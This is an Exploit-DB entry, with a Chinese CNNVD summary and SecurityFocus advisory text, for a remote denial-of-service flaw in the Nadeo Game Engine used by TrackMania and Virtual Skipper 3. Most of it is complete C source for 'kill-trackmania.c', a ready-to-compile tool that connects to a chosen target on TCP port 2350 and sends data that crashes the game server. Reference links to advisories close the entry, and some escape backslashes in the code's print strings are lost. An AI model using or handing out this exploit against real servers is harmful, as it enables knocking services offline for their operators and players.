https://www.exploit-db.com/exploits/23662
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200402-033

NadeoTrackMania和NadeoVirtualSkipper3版本的NadeoGameEngine存在漏洞。远程攻击者借助到TCP2350端口的畸形数据导致服务拒绝（服务器崩溃），该漏洞可能取决于长值或者错误的大小字段。

source: http://www.securityfocus.com/bid/9604/info

It has been reported that Nadeo Game Engine may be prone to a remote denial of service vulnerability that could allow an attacker to cause the software to crash or hang by sending arbitrary data to the software on TCP port 2350.

Nadeo Trackmania demo version has been reported to be affected by this issue.

/*
* [kill-trackmania.c]
* A remote DoS that affects the Trackmania game server
*
* by Scrap
* [email protected]
* http://www.securiteinfo.com
*
* gcc kill-trackmania.c -o kill-trackmania -O2
*
*/

#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
int sock;
struct sockaddr_in sin;
struct hostent *he;
unsigned long start;
char buffer[1024];
unsigned long counter;

printf("n [kill-trackmania.c] by Scrap / Securiteinfo.comn");

if (argc<2)

{
printf("Usage: %s targetnn",argv[0]);
exit(0);
}

if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}

start=inet_addr(argv[1]);
counter=ntohl(start);

sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(2350);

if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
exit(0);
}
printf("nt Sending Bomb... n");
send(sock, "Bomb from Securiteinfo.comnn",17,0);
close(sock);

printf("t Bomb sent...n");

}

来源:XF
名称:trackmania-dos(15081)
链接:http://xforce.iss.net/xforce/xfdb/15081
来源:BID
名称:9604
链接:http://www.securityfocus.com/bid/9604
来源:BUGTRAQ
名称:20040209Re:TrackManiaDemoDenialofService
链接:http://www.securityfocus.com/archive/1/353226
来源:BUGTRAQ
名称:20040208TrackManiaDemoDenialofService
链接:http://www.securityfocus.com/archive/1/353182
来源:www.securiteinfo.com
链接:http://www.securiteinfo.com/attaques/hacking/trackmaniados.shtml